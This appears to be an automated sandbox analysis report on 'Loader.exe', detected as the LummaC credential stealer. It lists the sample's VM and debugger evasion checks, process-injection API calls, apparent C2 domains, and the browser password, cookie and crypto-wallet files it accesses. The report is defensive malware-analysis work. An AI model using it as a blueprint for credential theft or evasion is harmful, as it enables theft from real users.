Source: C:\Users\user\Desktop\Loader.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Loader.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00EE822B push 9003h; ret	0_2_00EE8236
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00EBE75A push ecx; ret	0_2_00EBE76D
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004488E1 push edi; ret	3_2_004488E3
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043F2F0 push eax; mov dword ptr [esp], F5F4FB8Ah	3_2_0043F2F2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00EBE75A push ecx; ret	3_2_00EBE76D

Source: C:\Users\user\Desktop\Loader.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Loader.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Loader.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Window / User API: threadDelayed 6133

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe TID: 6672	Thread sleep time: -210000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe TID: 5156	Thread sleep count: 6133 > 30			Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Loader.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\Loader.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00ED0CF8 FindFirstFileExW,	0_2_00ED0CF8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00ED0DA9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00ED0DA9
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00ED0CF8 FindFirstFileExW,	3_2_00ED0CF8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00ED0DA9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00ED0DA9

Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: Loader.exe, 00000003.00000003.2205684949.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2298733813.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.3408995278.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2324979359.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2378382701.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2298858534.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2299868440.0000000000AAF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: Loader.exe, 00000003.00000003.2234281590.00000000033FC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: Loader.exe, 00000003.00000002.3408995278.0000000000A7C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWPg
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Loader.exe, 00000003.00000003.2205684949.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2298733813.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.3408995278.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2324979359.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2378382701.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2298858534.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2299868440.0000000000AAF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWI
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\Loader.exe

API call chain: ExitProcess graph end node

graph_3-33389

Source: C:\Users\user\Desktop\Loader.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Code function: 3_2_0043DA10 LdrInitializeThunk,

3_2_0043DA10

Source: C:\Users\user\Desktop\Loader.exe

Code function: 0_2_00EC72FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00EC72FD

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00EE619E mov edi, dword ptr fs:[00000030h]	0_2_00EE619E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00EB1690 mov edi, dword ptr fs:[00000030h]	0_2_00EB1690
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00EB1690 mov edi, dword ptr fs:[00000030h]	3_2_00EB1690

Source: C:\Users\user\Desktop\Loader.exe

Code function: 0_2_00ECC705 GetProcessHeap,

0_2_00ECC705

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00EBE06C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00EBE06C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00EC72FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00EC72FD
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00EBE42C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00EBE42C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00EBE420 SetUnhandledExceptionFilter,	0_2_00EBE420
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00EBE06C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00EBE06C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00EC72FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00EC72FD
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00EBE42C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00EBE42C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00EBE420 SetUnhandledExceptionFilter,	3_2_00EBE420

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Loader.exe

Code function: 0_2_00EE619E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_00EE619E

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Loader.exe

Memory written: C:\Users\user\Desktop\Loader.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: Loader.exe, 00000000.00000002.2157725593.0000000002383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: bashfulacid.lat
Source: Loader.exe, 00000000.00000002.2157725593.0000000002383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: tentabatte.lat
Source: Loader.exe, 00000000.00000002.2157725593.0000000002383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: curverpluch.lat
Source: Loader.exe, 00000000.00000002.2157725593.0000000002383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: talkynicer.lat
Source: Loader.exe, 00000000.00000002.2157725593.0000000002383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: shapestickyr.lat
Source: Loader.exe, 00000000.00000002.2157725593.0000000002383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: manyrestro.lat
Source: Loader.exe, 00000000.00000002.2157725593.0000000002383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: slipperyloo.lat
Source: Loader.exe, 00000000.00000002.2157725593.0000000002383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: wordyfindy.lat
Source: Loader.exe, 00000000.00000002.2157725593.0000000002383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: volcanohushe.click

Source: C:\Users\user\Desktop\Loader.exe

Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	0_2_00ED08CD
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00ED0062
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	0_2_00ED02B3
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	0_2_00ECBA4C
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00ED034E
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	0_2_00ED05A1
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	0_2_00ED06D5
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	0_2_00ED0600
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	0_2_00ECBFF0
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00ED07C7
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	0_2_00ED0720
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	3_2_00ED08CD
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_00ED0062
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	3_2_00ED02B3
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	3_2_00ECBA4C
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_00ED034E
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	3_2_00ED05A1
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	3_2_00ED06D5
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	3_2_00ED0600
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	3_2_00ECBFF0
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_00ED07C7
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	3_2_00ED0720

Source: C:\Users\user\Desktop\Loader.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Code function: 0_2_00EBEB50 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,

0_2_00EBEB50

Source: C:\Users\user\Desktop\Loader.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Loader.exe, 00000003.00000002.3408995278.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2378382701.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2330663526.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.3409099739.0000000000AF5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.3409741821.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2457635116.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\Loader.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Loader.exe PID: 504, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Loader.exe, 00000003.00000003.2298733813.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum-LTC\wallets
Source: Loader.exe, 00000003.00000003.2298733813.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: Loader.exe, 00000003.00000003.2298552259.0000000000B29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Libertyn
Source: Loader.exe, 00000003.00000003.2325081375.0000000000A91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Loader.exe, 00000003.00000003.2298733813.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Loader.exe, 00000003.00000003.2325081375.0000000000A88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: Loader.exe, 00000003.00000003.2325081375.0000000000A91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: Loader.exe, 00000003.00000003.2299980743.0000000000A89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Loader.exe, 00000003.00000003.2325081375.0000000000A88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
